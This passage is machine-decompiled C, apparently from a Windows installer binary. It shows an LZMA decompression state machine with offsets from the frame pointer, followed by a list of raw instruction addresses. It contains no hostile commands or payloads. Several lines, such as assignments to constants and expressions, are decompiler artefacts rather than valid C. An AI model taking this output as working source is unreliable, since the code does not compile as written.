											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                        0x00406609
                        0x00406609
                        0x00406609
                        0x00406609
                        0x0040660f
                        0x00406613
                        0x00406617
                        0x00406621
                        0x0040662f
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x0040693c
                        0x0040693c
                        0x00406940
                        0x00000000
                        0x00000000
                        0x00406942
                        0x0040694b
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406999
                        0x00406939
                        0x00406939
                        0x00406939
                        0x0040693c
                        0x00406940
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040699b
                        0x0040699b
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00406a50
                        0x00406a5a
                        0x00406a62
                        0x00406a69
                        0x00406a6b
                        0x00406a72
                        0x00406a76
                        0x00406a76
